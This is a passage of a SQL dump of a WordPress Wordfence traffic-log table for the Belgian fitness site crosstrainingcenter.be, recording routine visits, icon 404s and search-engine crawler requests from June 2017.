(75072, 1497287081.350493, 1837280593, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(75073, 1497287081.790301, 1837280593, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(75074, 1497287082.240094, 1837280593, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(75075, 1497287083.193366, 1837280593, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_0 like Mac OS X) AppleWebKit/602.1.38 (KHTML, like Gecko) Version/10.0 Mobile/14A300 Safari/602.1'),
(75076, 1497287083.929858, 1837280593, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(75077, 1497287084.661508, 1837280593, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(75078, 1497287085.117261, 1837280593, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(75079, 1497287085.653507, 1837280593, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(75080, 1497287086.079181, 1837280593, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(75081, 1497287086.517014, 1837280593, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(75082, 1497288162.712339, 676177847, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/le-cross-training/', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(75083, 1497288823.681279, 3587417960, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/contact/', '', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/603.2.5 (KHTML, like Gecko) Version/10.1.1 Safari/603.2.5'),
(75084, 1497288826.324153, 3587417960, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/', 'http://www.crosstrainingcenter.be/contact/', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/603.2.5 (KHTML, like Gecko) Version/10.1.1 Safari/603.2.5'),
(75085, 1497289915.899294, 1122253362, 0, 1, 0, 0, 1, 'http://crosstrainingcenter.be/indax.php', 'http://crosstrainingcenter.be/indax.php', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)'),
(75086, 1497291261.235767, 1837280593, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/603.2.5 (KHTML, like Gecko)'),
(75087, 1497291261.710711, 1837280593, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(75088, 1497291262.282269, 1837280593, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(75089, 1497291262.792529, 1837280593, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(75090, 1497291263.289805, 1837280593, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(75091, 1497291263.743115, 1837280593, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(75092, 1497291264.240979, 1837280593, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(75093, 1497291265.858713, 1837280593, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_0 like Mac OS X) AppleWebKit/602.1.38 (KHTML, like Gecko) Version/10.0 Mobile/14A300 Safari/602.1'),
(75094, 1497291266.538758, 1837280593, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(75095, 1497291267.539247, 1837280593, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(75096, 1497291268.047220, 1837280593, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(75097, 1497291268.679159, 1837280593, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(75098, 1497291269.547649, 1837280593, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(75099, 1497291270.126040, 1837280593, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(75100, 1497293414.395938, 1538656104, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_5) AppleWebKit/603.2.4 (KHTML, like Gecko)'),
(75101, 1497293414.889212, 1538656104, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)'),
(75102, 1497293415.371404, 1538656104, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)'),
(75103, 1497293415.838226, 1538656104, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)'),
(75104, 1497293416.403950, 1538656104, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)'),
(75105, 1497293416.901394, 1538656104, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)'),
(75106, 1497293417.384891, 1538656104, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)'),
(75107, 1497293417.887810, 1538656104, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_0 like Mac OS X) AppleWebKit/602.1.38 (KHTML, like Gecko) Version/10.0 Mobile/14A300 Safari/602.1'),
(75108, 1497293418.362969, 1538656104, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)'),
(75109, 1497293418.869124, 1538656104, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)'),
(75110, 1497293419.344763, 1538656104, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)'),
(75111, 1497293419.871954, 1538656104, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)'),
(75112, 1497293420.335733, 1538656104, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)'),
(75113, 1497293420.817682, 1538656104, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)'),
(75114, 1497293817.704200, 2509959250, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', 'https://www.google.be/', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.79 Safari/537.36 Edge/14.14393'),
(75115, 1497295637.808027, 1374769563, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_2 like Mac OS X) AppleWebKit/603.2.4 (KHTML, like Gecko) Version/10.0 Mobile/14F89 Safari/602.1'),
(75116, 1497295638.457173, 1374769563, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(75117, 1497295638.956694, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(75118, 1497295639.506520, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(75119, 1497295640.033876, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(75120, 1497295640.686356, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0');
INSERT INTO `wp_wfHits` (`id`, `ctime`, `IP`, `jsRun`, `is404`, `isGoogle`, `userID`, `newVisit`, `URL`, `referer`, `UA`) VALUES
(75121, 1497295641.496004, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(75122, 1497295642.046428, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(75123, 1497295642.572416, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(75124, 1497295643.045680, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(75125, 1497295643.525817, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(75126, 1497300330.492089, 1837280593, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/603.2.5 (KHTML, like Gecko)'),
(75127, 1497300331.031366, 1837280593, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(75128, 1497300331.476765, 1837280593, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(75129, 1497300331.917611, 1837280593, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(75130, 1497300332.400558, 1837280593, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(75131, 1497300333.026857, 1837280593, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(75132, 1497300333.489424, 1837280593, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(75133, 1497300334.010538, 1837280593, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_0 like Mac OS X) AppleWebKit/602.1.38 (KHTML, like Gecko) Version/10.0 Mobile/14A300 Safari/602.1'),
(75134, 1497300334.441043, 1837280593, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(75135, 1497300334.867568, 1837280593, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(75136, 1497300335.278546, 1837280593, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(75137, 1497300335.752546, 1837280593, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(75138, 1497300336.188348, 1837280593, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(75139, 1497300336.596313, 1837280593, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(75140, 1497302192.115690, 676177710, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/contact/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(75141, 1497302203.660396, 2637637594, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(75142, 1497302631.567064, 1123631300, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(75143, 1497305373.187974, 1123631300, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(75144, 1497311670.092200, 1123631300, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(75145, 1497312604.947880, 1123631171, 0, 0, 1, 0, 1, 'http://crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(75146, 1497312605.942945, 1123631300, 0, 0, 1, 0, 0, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(75147, 1497313717.129767, 2637637400, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(75148, 1497313717.129691, 2637637400, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(75149, 1497313856.024054, 3024883614, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/les-seances-namur/', '', 'Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)'),
(75150, 1497315020.238434, 1123631300, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(75151, 1497317799.104303, 3652617279, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/category/uncategorized/feed/', '', 'Mozilla/5.0 (compatible; AhrefsBot/5.2; +http://ahrefs.com/robot/)'),
(75152, 1497317818.214206, 96753435, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; AhrefsBot/5.2; +http://ahrefs.com/robot/)'),
(75153, 1497323590.175001, 1123631300, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(75154, 1497326292.071462, 2760155429, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; AhrefsBot/5.2; +http://ahrefs.com/robot/)'),
(75155, 1497336803.542767, 1123631300, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(75156, 1497341992.447184, 1123631300, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(75157, 1497350931.448918, 3024883481, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)'),
(75158, 1497358152.447314, 3024883602, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/comments/feed/', '', 'Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)'),
(75159, 1497361888.358458, 1374769563, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_2 like Mac OS X) AppleWebKit/603.2.4 (KHTML, like Gecko) Version/10.0 Mobile/14F89 Safari/602.1'),
(75160, 1497361888.965055, 1374769563, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(75161, 1497361889.503831, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(75162, 1497361889.999347, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(75163, 1497361890.476635, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(75164, 1497361891.102861, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(75165, 1497361891.623974, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(75166, 1497361892.080325, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(75167, 1497361892.614234, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(75168, 1497361893.088374, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(75169, 1497361893.560340, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(75170, 1497362539.107282, 2637637379, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(75171, 1497362539.334029, 2637637379, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(75172, 1497364361.356771, 3567663235, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', 'http://www.google.be/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&ved=0ahUKEwjBn7P0hLvUAhWKIlAKHfzaCawQFggoMAA&url=http%3A%2F%2Fwww.crosstrainingcenter.be%2F&usg=AFQjCNFlnF2lMOWCGxV4AnRa451d2QSVkQ&sig2=t7Xu36x676TsTBM1L3T9fw', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0'),
(75173, 1497364368.594383, 3567663235, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0'),
(75174, 1497364369.071734, 3567663235, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0'),
(75175, 1497364369.263727, 3567663235, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0'),
(75176, 1497366371.789082, 676177710, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/les-seances-namur/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(75177, 1497369406.897177, 1123631300, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(75178, 1497369407.354288, 1123631300, 0, 0, 1, 0, 0, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(75179, 1497370300.430834, 3342489297, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)'),
(75180, 1497370303.958500, 3342489297, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)'),
(75181, 1497371828.024155, 1123631300, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(75182, 1497381143.480984, 1374769563, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_2 like Mac OS X) AppleWebKit/603.2.4 (KHTML, like Gecko) Version/10.0 Mobile/14F89 Safari/602.1'),
(75183, 1497381144.047750, 1374769563, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(75184, 1497381144.583525, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(75185, 1497381145.050236, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(75186, 1497381145.578613, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(75187, 1497381146.077776, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(75188, 1497381146.707382, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(75189, 1497381147.258253, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(75190, 1497381147.845453, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(75191, 1497381148.399051, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(75192, 1497381148.897299, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(75193, 1497387723.191445, 1837280593, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/603.2.5 (KHTML, like Gecko)'),
(75194, 1497387723.734096, 1837280593, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(75195, 1497387724.219953, 1837280593, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
